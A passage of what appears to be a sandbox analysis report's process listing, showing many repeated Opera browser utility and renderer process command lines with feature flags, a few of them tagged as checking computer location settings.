--with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6644 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6792 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6784 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6868 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6884 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6852 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --mojo-platform-channel-handle=6912 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=8072 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=8076 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=4764 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=9504 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --mojo-platform-channel-handle=9620 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6952 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=8236 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=8248 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=8264 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=7976 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=7568 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=7676 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --mojo-platform-channel-handle=7940 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=4100 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=7744 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=7560 